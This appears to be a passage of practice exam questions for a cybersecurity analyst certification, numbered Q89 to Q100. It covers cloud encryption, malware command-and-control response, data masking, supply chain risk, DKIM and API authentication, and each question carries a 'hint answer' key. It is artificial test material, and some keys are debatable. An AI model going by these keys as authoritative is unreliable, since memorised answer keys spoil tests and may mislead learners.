Q89.A general contractor has a list of contract documents containing critical business data that are stored at a public cloud provider. The organization’s security analyst recently reviewed some of the storage containers and discovered most of the containers are not encrypted. Which of the following configurations will provide the MOST security to resolve the vulnerability?
A. Upgrading TLS 1.2 connections to TLS 1.3
B. Implementing AES-256 encryption on the containers
C. Enabling SHA-256 hashing on the containers
D. Implementing the Triple Data Encryption Algorithm at the file level
Hint answer: B
Q90.A network attack that is exploiting a vulnerability in the SNMP is detected. Which of the following should the cybersecurity analyst do FIRST?
A. Apply the required patches to remediate the vulnerability
B. Escalate the incident to the senior management team for guidance
C. Disable all privileged user accounts on the network
D. Temporarily block the attacking IP address
Hint answer: D
Q91.A new variant of malware is spreading on the company network using TCP/443 to contact its command-and-control server. The domain name used for callback continues to change, and the analyst is unable to predict future domain name variance. Which of the following actions should the analyst take to stop malicious communications with the LEAST disruption to service?
A. Implement a sinkhole with a high entropy level.
B. Disable TCP/53 at the perimeter firewall.
C. Block TCP/443 at the edge router.
D. Configure the DNS forwarders to use recursion.
Hint answer: A
Q92.A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the following describes the type of control that is being used?
A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification
Hint answer: B
Q93.A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one that:
A. enables remote code execution that is being exploited in the wild.
B. enables data leakage but is not known to be in the environment.
C. enables lateral movement and was reported as a proof of concept.
D. affected the organization in the past but was probably contained and eradicated.
Hint answer: A
Q94.An organization discovers motherboards within the environment that appear to have been physically altered during the manufacturing process. Which of the following is the BEST course of action to mitigate the risk of this reoccurring?
A. Perform an assessment of the firmware to determine any malicious modifications.
B. Conduct a trade study to determine if the additional risk constitutes further action.
C. Coordinate a supply chain assessment to ensure hardware authenticity
D. Work with IT to replace the devices with the known-altered motherboards.
Hint answer: C
Q95.Which of the following BEST describes HSM?
A. A computing device that manages cryptography, decrypts traffic, and maintains library calls
B. A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
C. A computing device that manages physical keys, encrypts devices, and creates strong cryptographic functions
D. A computing device that manages algorithms, performs entropy functions, and maintains digital signatures
Hint answer:B
Q96.A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The vulnerabilities are on systems that are dedicated to the firm's largest client. Which of the following is MOST likely inhibiting the remediation efforts?
A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime
Hint answer: D
Q97.Which of the following solutions is the BEST method to prevent unauthorized use of an API?
A. HTTPS
B. Geofencing
C. Rate limiting
D. Authentication
Hint answer: D
Q98.A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with malware. Which of the following is the MOST appropriate action to take in this situation?
A. Implement an IPS signature for the malware and update the deny list for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs' subnets and second-level domains
Hint answer: A
Q99.A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. An AAAA record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Hint answer: C
Q100.Which of the following techniques can be implemented to safeguard the confidentiality of sensitive information while allowing limited access to authorized individuals?
A. Deidentification
B. Hashing
C. Masking
D. Salting
Hint answer: C
